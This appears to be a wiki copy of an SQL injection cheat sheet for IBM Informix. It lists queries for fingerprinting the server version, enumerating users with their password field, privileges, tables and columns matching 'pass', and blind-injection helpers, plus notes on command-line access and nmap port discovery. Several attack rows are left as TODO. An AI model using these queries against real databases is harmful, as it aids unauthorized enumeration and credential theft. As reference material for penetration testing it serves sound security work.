====== Hacking - SQL Injection Cheat Sheet (Informix) ======
|Version|
SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix
|
|Comments|select 1 FROM systables WHERE tabid = 1; -- comment|
|Current User|
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
|
|List Users|select username, usertype, password from sysusers;|
|List Password Hashes|TODO|
|List Privileges|
select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users
|
|List DBA Accounts|TODO|
|Current Database|SELECT DBSERVERNAME FROM systables where tabid = 1; -- server name|
|List Databases|select name, owner from sysdatabases;|
|List Columns|select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;|
|List Tables|select tabname, owner FROM systables;|
|select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;|
|List Stored Procedures|select procname, owner FROM sysprocedures;|
|Find Tables From Column Name|select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%';|
|Select Nth Row|select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; -- selects the 10th row|
|Select Nth Char|SELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; -- returns 'C'|
|Bitwise AND|
select bitand(6, 1) from systables where tabid = 1; -- returns 0
select bitand(6, 2) from systables where tabid = 1; -- returns 2
|
|ASCII Value -> Char|TODO|
|Char -> ASCII Value|select ascii('A') from systables where tabid = 1;|
|Casting|
select cast('123' as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
|
|String Concatenation|
SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB'
SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB'
|
|String Length|SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;|
|If Statement|TODO|
|Case Statement|select tabid, case when tabid>10 then "High" else 'Low' end from systables;|
|Avoiding Quotes|TODO|
|Time Delay|TODO|
|Make DNS Requests|TODO|
|Command Execution|TODO|
|Local File Access|TODO|
|Hostname, IP Address|SELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; -- hostname|
|Location of DB files|TODO|
|Default/System Databases|
These are the system databases:
sysmaster
sysadmin*
sysuser*
sysutils*
* = don't seem to contain anything / don't allow reading
|
|Installing Locally|You can download [[https://www.ibm.com/developerworks/downloads/im/dsexp/?S_TACT=105AGX11&S_CMP=LP|Informix Dynamic Server Express Edition 11.5 Trial]] for Linux and Windows.|
|Database Client|
There's a [[https://www14.software.ibm.com/webapp/download/search.jsp?rs=ifxdl|database client SDK]] available, which might be of use. I couldn't get the demo client working.
I used [[http://squirrel-sql.sourceforge.net/|SQuirreL SQL Client Version 2.6.8]] after installing the [[https://www14.software.ibm.com/webapp/download/search.jsp?go=y&rs=ifxjdbc|Informix JDBC drivers]] ("emerge dev-java/jdbc-informix" on Gentoo).
|
|Logging in from command line|
If you get local admin rights on a Windows box and have a GUI logon:
- Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly.
- Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.
The following were set on my test system. This may help if you get command line access, but can't get a GUI - you'll need to change "testservername":
set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;
C:\WINDOWS\System32\Wbem;C:\PROGRA~1\ibm\gsk7\bin;C:\PROGRA~1\ibm\gsk7\lib;
C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin;
C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;
C:\PROGRA~1\IBM\IBMINF~1\11.50\xtend\krakatoa\jdbc.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set CLIENT_LOCALE=EN_US.CP1252
set DB_LOCALE=EN_US.8859-1
set SERVER_LOCALE=EN_US.CP1252
set DBLANG=EN_US.CP1252
mode con codepage select=1252
|
|Identifying on the network|
My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix:
$ sudo nmap -sS -sV 10.0.0.1 -p- -v --version-all
...
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
...
TODO How would we identify Informix listening on the network?
|
----
===== References =====
https://www.michaelboman.org/books/sql-injection-cheat-sheet-informix